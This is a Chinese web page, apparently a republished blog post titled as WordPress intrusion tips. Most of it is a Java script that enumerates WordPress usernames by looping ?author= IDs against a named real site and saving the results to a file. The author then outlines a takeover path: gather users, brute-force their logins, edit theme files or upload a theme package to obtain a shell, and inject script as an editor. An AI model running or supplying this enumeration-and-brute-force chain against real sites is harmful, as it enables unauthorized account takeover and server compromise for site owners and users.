网站地图    收藏   

子栏目

主页 > 后端 > 网站安全 >

WordPress博客入侵检测技巧 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 10:15 作者: 阅读:

[导读] 先贴下我的抓取wordpress 用户脚本import java io BufferedReader; import java io File; import java io FileWriter; import java io IOException; import java io InputStreamReader; import java...

先贴下我的抓取wordpress 用户脚本  
import java.io.BufferedReader; 
import java.io.File; 
import java.io.FileWriter; 
import java.io.IOException; 
import java.io.InputStreamReader; 
import java.net.URL; 
/** 
* WordpressGetUser 
* Group 类 用于匹配和抓取 html页面的数据 
* @author itleaf - http://blog.itleaf.info 
*/ 
public class wpUserCollection { 

  public static void main(String[] args) { 
    int set=1116 ;//设定循环次数 
        int i=1; 
        //for循环获得所有用户 
        for(i=1;i<=set;i++){ 
          String strUrl = "http://drops.wooyun.org/?author="+i; 
            try { 
                URL url = new URL(strUrl); 
                InputStreamReader isr = new InputStreamReader(url.openStream(),"utf-8"); // 统一使用utf-8 编码模式 
                // 使用 BufferedReader 来读取 InputStreamReader 转换成的字符 
                BufferedReader br = new BufferedReader(isr); 
                String strRead = ""; // 新增一个空字符串strRead来装载 BufferedReader 读取到的内容 
                // 定义正则 用于匹配我们需要的数据 
                String regularUser = ">[^<>]*</title>"; 
                // 创建一个GroupMethod类的对象 gMethod 方便后期调用其类里的 regularGroup方法 
                GroupMethod gMethod = new GroupMethod(); 
                while ((strRead = br.readLine()) != null) {                   
                    /** 
                     * 用于获取用户名 
                     */ 
                  String strGet = gMethod.regularGroup(regularUser, strRead); 
                   if (!strGet.equals("")) { 
                         //这里同样用到了substring方法 来剔除'<' 和 "</a>" 标签 来获取我们想要结果 
                     strGet = strGet.substring(1, strGet.indexOf(" ")); 
                     File file = new File("e://wpUser.txt"); 
                     FileWriter out =new FileWriter(file, true); 
                     out.write(strGet+"\r\n");//追加换行保存到 
                     out.close(); 
                         System.out.println(strGet); 
                     } 
                } 
                br.close(); // 读取完成后关闭读取器 
            } catch (IOException e) { 
                System.out.println("出错了,没有此用户!"); 
            } 
           
        } 
         
    } 
} 
import java.util.regex.Matcher; 
import java.util.regex.Pattern; 
public class GroupMethod { 
    // 传入2个字符串参数 一个是pattern(我们使用的正则) 另一个matcher是html源代码 
    public String regularGroup(String pattern, String matcher) { 
        Pattern p = Pattern.compile(pattern, Pattern.CASE_INSENSITIVE); 
        Matcher m = p.matcher(matcher); 
        if (m.find()) { // 如果读到 
            return m.group();// 返回捕获的数据 
        } else { 
            return ""; // 否则返回一个空字符串 
        } 
    } 
}

 

 
在没0day的情况下我的思路只有是搜集用户——爆破——爆破成功——改主题文件/上传主题包等——shell 
 
不过有时会遇到/wp-admin/目录ip访问限制,bae、sae等环境就麻烦了~ 
 
不过在管理者跟编辑的权限下是可以贴script等标签的(如:评论框,target.com/wp-login.php即可登录,无法访问后台),之后我就不知到怎么玩了~ 
 

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论